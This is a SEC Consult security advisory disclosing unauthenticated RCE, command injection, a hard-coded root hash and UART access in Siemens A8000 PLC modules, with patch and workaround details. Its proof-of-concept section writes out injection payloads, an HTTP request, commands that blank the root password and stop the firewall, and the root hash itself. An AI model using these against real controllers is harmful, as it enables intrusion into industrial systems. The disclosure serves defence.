Siemens A8000 CP-8050 / CP-8031 Code Execution / Command Injection

`SEC Consult Vulnerability Lab Security Advisory < 20230703-0 >  
=======================================================================  
title: Multiple Vulnerabilities including Unauthenticated RCE  
product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00)  
Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00)  
vulnerable version: <= V04.92  
fixed version: CPCI85 V05  
CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920,  
CVE-2023-33921  
impact: Critical  
homepage: https://www.siemens.com  
found: 2023-02-15  
by: Stefan Viehböck (Office Vienna)  
Christian Hager (Office Vienna)  
Steffen Robertz (Office Vienna)  
Gerhard Hechenberger (Office Vienna)  
Gorazd Jank (Office Vienna)  
Constantin Schieber-Knoebl (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"We are a technology company focused on industry, infrastructure,  
transport, and healthcare. From more resource-efficient factories,  
resilient supply chains, and smarter buildings and grids, to cleaner  
and more comfortable transportation as well as advanced healthcare,  
we create technology with purpose adding real value for customers."  
  
Source: https://new.siemens.com/global/en/company/about.html  
  
  
Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.  
Customers should update to CPCI85 V05 or later version.  
(https://support.industry.siemens.com/cs/ww/en/view/109804985/)  
  
SEC Consult highly recommends to perform a thorough security review of  
the product conducted by security professionals to identify and resolve  
potential further security issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Unauthenticated Remote Code Execution (CVE-2023-28489)  
By sending an HTTP request with a crafted header to port 80/443 of  
the PLC, arbitrary commands can be executed as system user. The port  
is used to configure and control Siemens PLCs with the Siemens  
Toolbox II application and is typically accessible on such devices.  
  
2) Authenticated Command Injection (CVE-2023-33919)  
Due to missing server-side input sanitation, any user with access to  
the SICAM WEB interface can execute arbitrary commands as user "root"  
on the device. This works by setting malicious parameters and starting  
an Ethernet package capture.  
  
3) Hard-coded Root Password (CVE-2023-33920)  
The PLC contains a hard-coded "root" user password hash. This  
password hash is the same on all devices. If the corresponding  
password is known, it could be used to login via UART and SSH.  
  
4) Console Login via UART (CVE-2023-33921)  
The UART interface can be accessed with physical access to the PCB.  
After connecting to the interface, boot information is given and a  
login prompt is provided. Login as "root" user is possible after  
changing the hard-coded "root" password hash (see 1,2, and 3).  
  
  
Proof of concept:  
-----------------  
1) Unauthenticated Remote Code Execution (CVE-2023-28489)  
To exploit this vulnerability, an HTTP request including the command  
must be crafted. No "/" characters can be used, therefore commands  
are encoded as base64, e.g., "id" as "aWQ=". The command must be  
provided as UPLOADFILENAME header. A full command looks as follows:  
  
;echo aWQ=| base64 -d | sh #  
  
The following header format must be obeyed:  
* User-Agent: SICAM TOOLBOX II  
* Session-ID: [ARBITRARY 16 CHARACTERS]  
* UPLOADFILENAME: [COMMAND]  
  
Additionally, the request body must contain the following POST parameters:  
* type=20  
* length=[ARBITRARY]  
* data=[ARBITRARY]  
  
A valid request can be seen below:  
-----------------------------------------------------------------------  
[ POC request removed ]  
-----------------------------------------------------------------------  
  
If it worked, the response body will be "type=21". Additionally, the  
output on the UART interface indicates code execution as root user:  
-----------------------------------------------------------------------  
base64: /ies/IN/_: No such file or directory  
uid=0(root) gid=0(root)  
-----------------------------------------------------------------------  
  
Subsequently, the SSH port can be opened by sending the following  
commands separately and encoded as base64 string. They will replace  
the set default root password hash with an empty password hash,  
reconfigure the Dropbear SSH daemon and stop the firewall:  
-----------------------------------------------------------------------  
sed -i  
s'/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\/FWtDljQjCbm6JnZqxiMg  
re5P14Kv2zAH1:/:32BZgrJ3XBMoY:/' /etc/shadow  
sed -i s'/"$DROPBEAR_ARGS -R -s -g"/"$DROPBEAR_ARGS -R"/' /etc/init.d/dropbear  
/etc/init.d/dropbear restart  
/etc/init.d/rc.firewall stop  
-----------------------------------------------------------------------  
  
After this, login via SSH as root is possible:  
-----------------------------------------------------------------------  
ssh root@[IP]  
root@[IP]'s password:  
~# id  
uid=0(root) gid=0(root) groups=0(root),10(wheel)  
~#  
-----------------------------------------------------------------------  
  
  
2) Authenticated Command Injection (CVE-2023-33919)  
To trigger the command injection vulnerability, the payload must be set in  
the "LAN port group" field on the SICAM WEB page "Monitoring & Simulation"  
-> "Ethernet Packet Capture" section "Capture configuration"  
(other fields may also be affected).  
As the web interface only provides a drop-down menu, the payload must  
be set by manipulating the JavaScript logic or by directly manipulating  
the HTTP request as below, where "ping [IP]\nBBBBBBB" was set:  
  
-----------------------------------------------------------------------  
POST /sicweb-ajax/rtum85/cview HTTP/1.1  
Host: [HOST]  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/xml  
SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT  
Content-Length: 198  
Origin: http://[HOST]  
Connection: close  
Referer: http://[HOST]/  
  
<?xml version="1.0" encoding="UTF-8"?>  
<Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0">  
<value>  
ping [IP]  
BBBBBBB</value>  
</parameter></view></Cmd_SetCustomViewValue>  
-----------------------------------------------------------------------  
  
The line break in the payload is especially important, as the command is  
executed as part of a shell script.  
This script is generated and executed by pressing the "Start/Stop trace"  
button in the "Capture Controlling" section and saved as  
/tmp/incws_tcpdump.sh. An excerpt with the injected command is shown  
below:  
  
-----------------------------------------------------------------------  
[...] # lets start tcpdump  
tcpdump -i  
ping [IP] BBBBBBB '(ether host 00:11:11:33:44:00) and (host 1.1.1.2 or host 2.2.2.34) and (port 999)' -C 1 -W 4 -U -w /var/log/wireshark.pcap &  
[...]  
-----------------------------------------------------------------------  
  
The executed script creates a process running as root user, which can  
be seen by running "ps" on the device:  
  
-----------------------------------------------------------------------  
root 1100 0.0 0.1 1784 1168 ? S Feb21 0:00 /bin/sh /etc/init.d/rc.sysinit  
root 1149 0.1 0.3 11768 1748 ? S1 Feb21 6:03 \_ /ies/apps/system/bin/ISV00.elf /ies/apps/sys_desc/target_rc.json  
[...]  
www-data 1487 0.0 0.6 7568 3444 ? S Feb21 0:40 \_ /usr/sbin/lighttpd -Df /etc/lighttpd/lighttpd.conf  
root 10655 0.0 0.2 1880 1344 ? S 04:55 0:00 \_ /bin/sh /tmp/incws_tcpdump.sh  
root 10667 0.0 0.2 1884 1360 ? S 04:57 0:00 \_ ping [IP]  
-----------------------------------------------------------------------  
  
  
3) Hard-coded Root Password (CVE-2023-33920)  
A hard-coded "root" user password hash can be found in the /etc/shadow  
file:  
-----------------------------------------------------------------------  
root:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo/FWtDljQjCbm6JnZqxiMg  
re5P14Kv2zAH1:16436:0:99999:7:::  
-----------------------------------------------------------------------  
  
  
4) Console Login via UART (CVE-2023-33921)  
The serial console (UART) can be accessed on the backside of the PCB  
on two Vias. After removing an additional logic IC, receiving data and  
sending data is possible with the following UART settings:  
* Voltage: 3.3V  
* Speed: 115200 Baud  
* Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1)  
Extensive boot log output can be received. Some output is shown below:  
-----------------------------------------------------------------------  
U-Boot SPL 2013.01.01 (Jan 16 2020 - 12:56:02)  
BOARD : Altera SOCFPGA Cyclone V Board  
CLOCK: EOSC1 clock 50000 KHz  
[...]  
Starting IES system  
-----------------------------------  
Welcome to SICAM IES  
-----------------------------------  
  
Welcome to  
_______. __ ______ ___ .___ ___.  
/ || | / | / \ | \/ |  
| (----`| | | ,----' / ^ \ | \ / |  
\ \ | | | | / /_\ \ | |\/| |  
.----) | | | | `----./ _____ \ | | | |  
|_______/ |__| \______/__/ \__\ |__| |__| RTUs  
  
[...]  
sicam login:  
-----------------------------------------------------------------------  
  
Additionally, a console login form is displayed. Login is possible if  
the password for the set "root" user password hash (see 3) is known.  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following product has been tested:  
* Siemens A8000 CP-8050 04.92  
* Siemens A8000 CP-8031 04.92  
  
  
Vendor contact timeline:  
------------------------  
2023-03-14: Contacting vendor through [email protected], sending  
encrypted advisory  
2023-03-29: Naming researchers involved  
2023-03-31: Requesting state. Vulnerability 1 will be published first  
due to criticality. Rest will follow.  
2023-04-11: Siemens releases advisory for unauthenticated RCE  
(Vulnerability 1, CVE-2023-28489)  
2023-06-13: Siemens releases advisory for vulnerability 2, 3 and 4  
(CVE-2023-33919, CVE-2023-33920, CVE-2023-33921)  
2023-06-21: Siemens has additional feedback regarding the contents of the  
advisory.  
2023-07-03: Release of security advisory.  
  
  
Solution:  
---------  
Update to firmware CPCI85 V05 or later version, see vendor advisory  
for further information:  
https://cert-portal.siemens.com/productcert/html/ssa-472454.html  
https://cert-portal.siemens.com/productcert/html/ssa-731916.html  
  
  
Workaround:  
-----------  
Restrict network access to the A8000 CP-8050/CP8031 module or disable the  
Toolbox II communication on port 80/443. Make sure to strictly limit  
physical access to the PLC during and also after its life cycle.  
  
  
Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF Stefan Viehböck, Christian Hager, Steffen Robertz, Gerhard Hechenberger,  
Gorazd Jank, Constantin Schieber-Knoebl / @2023  
  
`